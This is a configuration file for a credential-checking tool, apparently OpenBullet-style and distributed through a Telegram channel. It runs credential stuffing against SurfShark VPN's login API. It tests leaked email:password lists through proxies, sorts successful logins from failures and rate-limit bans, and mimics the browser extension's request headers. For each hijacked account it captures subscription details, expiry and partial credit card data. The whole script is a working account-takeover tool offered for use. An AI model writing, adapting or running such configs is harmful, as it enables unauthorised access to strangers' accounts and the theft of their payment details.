[SETTINGS]
{
  "Name": "SurfShark VPN {Extension Api}",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2021-07-15T11:01:11.8303345+05:30",
  "AdditionalInfo": "Config made by @JustDaixD join https://t.me/Configs_by_JustDaixD",
  "RequiredPlugins": [],
  "Author": "Just Dai xD",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": true,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "SurfShark {Extension Api}",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST POST "https://api.surfshark.com/v1/auth/login" 
  CONTENT "{\"username\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json;charset=utf-8" 
  HEADER "Host: api.surfshark.com" 
  HEADER "Connection: keep-alive" 
  HEADER "sec-ch-ua: \" Not;A Brand\";v=\"99\", \"Microsoft Edge\";v=\"91\", \"Chromium\";v=\"91\"" 
  HEADER "pragma: no-cache" 
  HEADER "cache-control: no-cache" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.67" 
  HEADER "Accept: */*" 
  HEADER "Origin: chrome-extension://ailoabdmgclmfmhdagmlohpjlbpffblp" 
  HEADER "Sec-Fetch-Site: none" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Accept-Language: en-US,en;q=0.9" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "<RESPONSECODE>" Contains "401" 
  KEYCHAIN Success OR 
    KEY "\"token\":\"" 
  KEYCHAIN Ban OR 
    KEY "<RESPONSECODE>" Contains "429" 

PARSE "<SOURCE>" JSON "token" -> VAR "token" 

REQUEST GET "https://api.surfshark.com/latest/payment/subscriptions/current" 
  
  HEADER "Host: api.surfshark.com" 
  HEADER "Connection: keep-alive" 
  HEADER "sec-ch-ua: \" Not;A Brand\";v=\"99\", \"Microsoft Edge\";v=\"91\", \"Chromium\";v=\"91\"" 
  HEADER "pragma: no-cache" 
  HEADER "cache-control: no-cache" 
  HEADER "authorization: Bearer <token>" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.67" 
  HEADER "Accept: */*" 

#Subscription PARSE "<SOURCE>" JSON "name" CreateEmpty=FALSE -> CAP "Subscription" 

#Peariod PARSE "<SOURCE>" JSON "frequencyUnit" CreateEmpty=FALSE -> CAP "Peariod" "" "ly" 

#Free_trial PARSE "<SOURCE>" JSON "trial" CreateEmpty=FALSE -> CAP "Free trial" 

#Renewable PARSE "<SOURCE>" JSON "renewable" CreateEmpty=FALSE -> CAP "Renewable" 

#Upgradable PARSE "<SOURCE>" JSON "upgradable" CreateEmpty=FALSE -> CAP "Upgradable" 

#Expiry PARSE "<SOURCE>" LR "\"expiresAt\":\"" "T" CreateEmpty=FALSE -> CAP "Expiry" 

FUNCTION GetRemainingDay "<Expiry>" -> CAP "Days Left" 

#Currency PARSE "<SOURCE>" LR "\"currency\":{\"code\":\"" "\"" CreateEmpty=FALSE -> CAP "Currency" 

#cardType PARSE "<SOURCE>" JSON "cardType" -> VAR "cardType" 

#cardLastNumber PARSE "<SOURCE>" JSON "cardLastNumber" -> VAR "cardLastNumber" 

#cardExpiredYear PARSE "<SOURCE>" JSON "cardExpiredYear" -> VAR "cardExpiredYear" 

#cardExpiredMonth PARSE "<SOURCE>" JSON "cardExpiredMonth" -> VAR "cardExpiredMonth" 

FUNCTION Constant "<cardType> **** **** **** <cardLastNumber> <cardExpiredMonth>/<cardExpiredYear>" -> CAP "CreditCard" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "EXPIRED" OR 
    KEY "\"status\":\"expired\"," 
  KEYCHAIN Success OR 
    KEY "<Days Left>" GreaterThan "0" 

FUNCTION Constant "@JustDaixD" -> CAP "Config made by" 

